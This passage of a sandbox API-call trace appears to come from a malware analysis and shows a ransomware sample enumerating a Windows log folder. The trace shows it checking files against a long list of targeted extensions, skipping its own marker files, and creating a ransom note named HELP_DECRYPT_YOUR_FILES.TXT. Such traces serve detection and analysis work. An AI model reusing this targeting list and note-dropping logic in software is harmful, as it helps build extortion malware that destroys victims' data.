fx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.218] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xa689893c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xac9249a5, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateUx.001.etl", cAlternateFileName="UP654C~1.ETL")) returned 1
	[0179.218] lstrcmpW (lpString1="UpdateUx.001.etl", lpString2="..") returned 1
	[0179.218] lstrcmpW (lpString1="UpdateUx.001.etl", lpString2=".") returned 1
	[0179.218] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.218] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateUx.001.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.001.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.001.etl"
	[0179.218] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.001.etl") returned 50
	[0179.218] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.219] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.001.etl", cchLength=0x32 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updateux.001.etl") returned 0x32
	[0179.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.219] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updateux.001.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.219] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updateux.001.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updateux.001.etl") returned="c:\\users\\all users\\usoshared\\logs\\updateux.001.etl"
	[0179.219] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updateux.001.etl") returned 50
	[0179.224] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.225] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.225] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.225] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe7b0d97d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xa690be1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateUx.002.etl", cAlternateFileName="UPDATE~3.ETL")) returned 1
	[0179.225] lstrcmpW (lpString1="UpdateUx.002.etl", lpString2="..") returned 1
	[0179.225] lstrcmpW (lpString1="UpdateUx.002.etl", lpString2=".") returned 1
	[0179.225] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.225] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateUx.002.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.002.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.002.etl"
	[0179.226] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.002.etl") returned 50
	[0179.226] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.226] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.002.etl", cchLength=0x32 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updateux.002.etl") returned 0x32
	[0179.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.226] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updateux.002.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.226] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updateux.002.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updateux.002.etl") returned="c:\\users\\all users\\usoshared\\logs\\updateux.002.etl"
	[0179.226] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updateux.002.etl") returned 50
	[0179.226] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.227] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.227] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.228] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe7b0d97d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xa690be1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateUx.002.etl", cAlternateFileName="UPDATE~3.ETL")) returned 0
	[0179.228] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0179.228] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0179.228] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\USOShared\\Logs" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs") returned="C:\\Users\\All Users\\USOShared\\Logs"
	[0179.228] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\*.*") returned="C:\\Users\\All Users\\USOShared\\Logs\\*.*"
	[0179.228] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.229] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.229] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\USOShared\\Logs\\HELP_DECRYPT_YOUR_FILES.TXT") returned 61
	[0179.229] CreateFileW (lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoshared\\logs\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
